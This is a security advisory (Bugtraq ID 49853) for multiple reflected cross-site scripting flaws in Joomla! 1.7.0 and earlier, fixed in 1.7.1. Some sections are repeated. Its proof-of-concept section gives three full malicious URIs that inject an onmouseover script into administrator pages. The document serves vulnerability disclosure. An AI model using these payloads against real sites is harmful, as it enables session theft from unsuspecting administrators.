Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
BID:49853
Info
Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 49853 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 29 2011 12:00AM |
| Updated: | Mar 19 2015 08:09AM |
| Credit: | Aung Khant |
| Vulnerable: |
Joomla Joomla! 1.6.6 Joomla Joomla! 1.6.4 Joomla Joomla! 1.6.3 Joomla Joomla! 1.6.2 Joomla Joomla! 1.6.1 Joomla Joomla! 1.6 Joomla Joomla! 1.5.23 Joomla Joomla! 1.5.22 Joomla Joomla! 1.5.20 Joomla Joomla! 1.5.19 Joomla Joomla! 1.5.18 Joomla Joomla! 1.5.17 Joomla Joomla! 1.5.16 Joomla Joomla! 1.5.15 Joomla Joomla! 1.5.14 Joomla Joomla! 1.5.12 Joomla Joomla! 1.5.11 Joomla Joomla! 1.5.10 Joomla Joomla! 1.5.9 Joomla Joomla! 1.5.8 Joomla Joomla! 1.5.7 Joomla Joomla! 1.5.5 Joomla Joomla! 1.5.4 Joomla Joomla! 1.5.2 Joomla Joomla! 1.5.1 Joomla Joomla! 1.7.0 Joomla Joomla! 1.6.5 Joomla Joomla! 1.6.4 Joomla Joomla! 1.6.3 Joomla Joomla! 1.6.1 Joomla Joomla! 1.6.0 Joomla Joomla! 1.6 RC1 Joomla Joomla! 1.6 Beta9 Joomla Joomla! 1.6 Beta8 Joomla Joomla! 1.6 Beta7 Joomla Joomla! 1.6 Beta6 Joomla Joomla! 1.6 Beta5 Joomla Joomla! 1.6 Beta4 Joomla Joomla! 1.6 Beta3 Joomla Joomla! 1.6 Beta2 Joomla Joomla! 1.6 Beta15 Joomla Joomla! 1.6 Beta14 Joomla Joomla! 1.6 Beta13 Joomla Joomla! 1.6 Beta12 Joomla Joomla! 1.6 Beta11 Joomla Joomla! 1.6 Beta10 Joomla Joomla! 1.6 Beta1 Joomla Joomla! 1.6 Alpha2 Joomla Joomla! 1.6 Alpha Joomla Joomla! 1.5.6 Joomla Joomla! 1.5.3 Joomla Joomla! 1.5.22 Joomla Joomla! 1.5.21 Joomla Joomla! 1.5.15 Rc Joomla Joomla! 1.5.13 Joomla Joomla! 1.5.0 |
| Not Vulnerable: |
Joomla Joomla! 1.7.1 |
Discussion
Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! 1.7.0 and prior are vulnerable.
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker could leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This could allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Joomla! 1.7.0 and prior are vulnerable.
Exploit / POC
Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://example.com/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://example.com/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
http://example.com/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
Solution / Fix
Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
Solution:
The vendor has released an update. Please see the references for details.
Solution:
The vendor has released an update. Please see the references for details.
References
Joomla! 1.7.0 and Prior Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Joomla Homepage (Joomla)